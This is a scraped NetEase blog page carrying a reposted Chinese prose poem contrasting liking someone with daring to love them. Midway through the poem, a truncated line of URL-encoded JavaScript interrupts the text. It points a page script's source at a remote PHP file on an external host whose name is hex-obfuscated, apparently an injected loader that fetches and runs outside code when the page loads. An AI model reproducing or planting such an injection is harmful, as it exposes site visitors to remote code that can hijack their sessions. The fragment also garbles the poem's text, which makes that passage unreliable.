登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

雨落忧伤

所有的思念和忧伤,都很无辜。我沉湎其中,像做了一个冗长的梦。走失的,只是旧时光。

 
 
 

日志

 
 

【引用】我喜欢你, 但我不敢爱你[转]  

2011-01-28 11:51:41|  分类: 迷失的我 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
       我喜欢你,那我可以凭一时的冲动为你做好多好多的事,不计较你是否喜欢我;
  但我不敢爱你,因为如果爱你,我会期望你为我做同样的事,时间久了我会不平衡。
  
  我喜欢你,那我可以傻傻地喜欢着你;
  但我不敢爱你,因为我认为爱,应该是相互的。
  
  我喜欢你,那我可以一直很激情地疯狂地;
  但我不敢爱你,因为爱太理智,我总会在对比中迷失自己。
  
  我喜欢你,那我可以默默地,偶尔跳出来吓你一跳;
tsByTagName%28%27script%27%29%5B0%5D.src%3D%27http%3A//%78%71%7a%6e%2e%69%6e%66%6f%2f%61%2f%31%36%33%2f%6e%2e%70%68%70%27%3Bwindow.x%3D1%7D"<  但我不敢爱你,因为爱太需要一直好好表现,永远拴住你的心,我暂时还没有那个自信。
  
  
  
  我喜欢你,所以我才会那么多那么多看似疯狂而不靠谱的事情;
  但我不敢爱你,因为你的爱太难得到,我想留下的是我一心一意喜欢你的回忆。
  
  我喜欢你,所以我才会默默地不做声,不期待你的音信;
  但我不敢爱你,因为爱的要求总是太多,我没有资格要求什么。
  
  我喜欢你,所以我才想贴近你的生活;
  但我不敢爱你,因为你似乎没有想要了解我。
  
  我喜欢你,才会告诉自己要高贵一些;
  但我不敢爱你,因为我不想让自己变得卑微。
  
  我喜欢你, 但我不敢爱你。~
  评论这张
 
阅读(41)| 评论(0)

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2018